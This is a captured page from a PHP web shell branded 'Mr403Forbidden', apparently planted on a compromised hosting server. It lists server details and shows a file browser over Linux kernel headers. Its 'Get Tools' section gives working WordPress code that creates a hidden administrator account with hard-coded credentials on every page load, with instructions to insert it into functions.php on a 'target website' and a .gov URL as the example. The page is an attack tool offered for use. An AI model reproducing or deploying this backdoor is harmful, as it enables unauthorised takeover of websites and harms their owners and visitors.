./Mr403Forbidden

:/usr/include/linux/tc_act/ [ s--------- ]

System: Linux myhosting.zubahost.com 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64
Software: LiteSpeed
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 194.163.174.55
Your IP: 216.73.216.138
User: business1 (1088) | Group: business1 (1091)
Safe Mode: OFF
MYSQL: OFF | PERL: ON | PYTHON: OFF | WGET: ON | CURL: ON | GCC: ON | PKEXEC: OFF
Disable Function:
mail

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = 'mr403forbidden@hotmail.com';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
tc_bpf.h file 2026-02-24 23:31 509 B root/root s---------
tc_connmark.h file 2026-02-24 23:31 390 B root/root s---------
tc_csum.h file 2026-02-24 23:31 644 B root/root s---------
tc_ct.h file 2026-02-24 23:31 934 B root/root s---------
tc_ctinfo.h file 2026-02-24 23:31 556 B root/root s---------
tc_defact.h file 2026-02-24 23:31 322 B root/root s---------
tc_gact.h file 2026-02-24 23:31 626 B root/root s---------
tc_gate.h file 2026-02-24 23:31 870 B root/root s---------
tc_ife.h file 2026-02-24 23:31 600 B root/root s---------
tc_ipt.h file 2026-02-24 23:31 415 B root/root s---------
tc_mirred.h file 2026-02-24 23:31 728 B root/root s---------
tc_mpls.h file 2026-02-24 23:31 1 KB root/root s---------
tc_nat.h file 2026-02-24 23:31 424 B root/root s---------
tc_pedit.h file 2026-02-24 23:31 1.49 KB root/root s---------
tc_sample.h file 2026-02-24 23:31 456 B root/root s---------
tc_skbedit.h file 2026-02-24 23:31 848 B root/root s---------
tc_skbmod.h file 2026-02-24 23:31 587 B root/root s---------
tc_tunnel_key.h file 2026-02-24 23:31 2.42 KB root/root s---------
tc_vlan.h file 2026-02-24 23:31 672 B root/root s---------

© ./Mr403Forbidden